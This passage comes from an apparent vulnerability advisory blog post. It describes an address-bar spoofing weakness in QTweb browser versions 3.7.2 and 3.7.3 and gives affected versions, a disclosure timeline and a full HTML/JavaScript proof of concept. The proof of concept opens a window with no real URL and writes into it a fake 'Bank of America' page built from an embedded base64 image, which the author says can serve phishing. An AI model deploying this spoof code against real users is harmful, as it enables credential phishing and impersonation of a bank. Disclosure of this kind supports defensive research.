<tr><td class="tr-caption" style="text-align: center;"><b><span style="color: black;">Whithout Any URL</span></b></td></tr>
</tbody></table>
<div style="text-align: justify;">
Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 </div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s1600/qt2.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s400/qt2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Popup Whithout Toolbars and address bar</b></td></tr>
</tbody></table>
################<br />
Versions afected<br />
################<br />
<br />
QTweb 3.7.2 Vulnerable<br />
QTweb 3.7.3 (buils 087) Vulnerable<br />
and posible prior versions.<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open(":#:","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,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'/>");<br />
}<br />
</script><br />
</head><br />
<body><br />
<h1>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</h1><br />
<noscript><p>this testcase requires JavaScript to run.</p></noscript><br />
<p>First Click in this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p><br />
<p>and Look in result window, the address bar , don't show The url <br />
and if you write any url in the address bar, the browser do not navigate to it.<br />
This issue can be used to spoof sites or pishing attacks.<br />
Safari 5.1 (7534.50)<br />
</body><br />
</html><br />
<br />
################<br />
Solution<br />
###############<br />
<br />
No solution at this time !!!<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :Mar 30, 2011<br />
Vendor Notify: Sep 28, 2011<br />
Vendor response: XXXXX<br />
Vendor Patch: XXXXXX<br />
Public Disclosure: Oct 03, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
